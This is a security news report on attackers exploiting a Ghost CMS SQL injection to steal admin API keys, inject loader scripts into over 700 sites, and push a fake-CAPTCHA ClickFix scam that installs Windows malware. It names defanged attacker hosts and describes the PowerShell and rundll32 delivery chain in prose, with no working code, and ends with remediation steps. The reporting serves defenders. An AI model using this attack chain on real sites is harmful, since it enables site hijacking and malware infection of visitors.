Ghost CMS SQL flaw used to hijack 700+ sites

Security researchers at QiAnXin XLab reported that attackers exploited CVE-2026-26980, a critical SQL injection in Ghost CMS, to steal administrator API keys and inject malicious JavaScript into over 700 websites. The campaign, first observed on May 7, 2026, used the compromised pages to deliver a ClickFix scam that tricks Windows users into running malware.

The vulnerability affected Ghost’s Content API and carried a CVSS score of 9.4. The flaw allowed an unauthenticated actor to read arbitrary data from a site database, including admin API keys. Ghost released a patch in February 2026 in version 6.19.1 after the issue was discovered with the help of Anthropic’s Claude tool.

Attackers used stolen admin API keys to call the Ghost Admin API and alter published content in bulk. The injected code placed a two-stage JavaScript loader at the bottom of articles. That loader fetched a runtime payload from an external address, clo4shara[.]xyz/11z77u3.php, which QiAnXin XLab identified as a traffic distribution script provided by the Adspect cloaking service.

QiAnXin XLab wrote that “Its core function is to collect various fingerprint information from the user’s browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions.” The cloaking layer served benign content to scanners while delivering the real payload to targeted visitors.

Targeted visitors were shown a fake CAPTCHA inside an iframe and instructed to copy and paste a Base64-encoded command into the Windows Run dialog. That command downloaded a ZIP archive, extracted a batch script, and executed a PowerShell command to fetch a DLL and run it with rundll32.exe. Later variants replaced the DLL with a JavaScript payload. In each case the final objective was to install a Windows executable.

Researchers identified two types of final payloads. One was a signed PuTTY client delivered by a DLL-based dropper. The other was an Inno Setup installer for a modified Electron application based on the open-source Grape desktop client. The Electron app established persistence and polled a command-and-control host, web-telegram[.]ug, every 30 seconds for instructions to run JavaScript or executables.

QiAnXin XLab assessed that at least two separate threat clusters ran the operation and that attackers could contaminate some sites within a single day. Compromised sites included university pages and organizations across blockchain, artificial intelligence, SaaS, security research, media and fintech sectors. The cloaking script used in the campaign supports 19 commands for running arbitrary JavaScript and remotely controlling a browser.

Ghost CMS users are advised to upgrade instances to version 6.19.1, rotate all credentials, remove injected content, review access logs for suspicious activity, and notify site visitors who may have been exposed during the contamination period.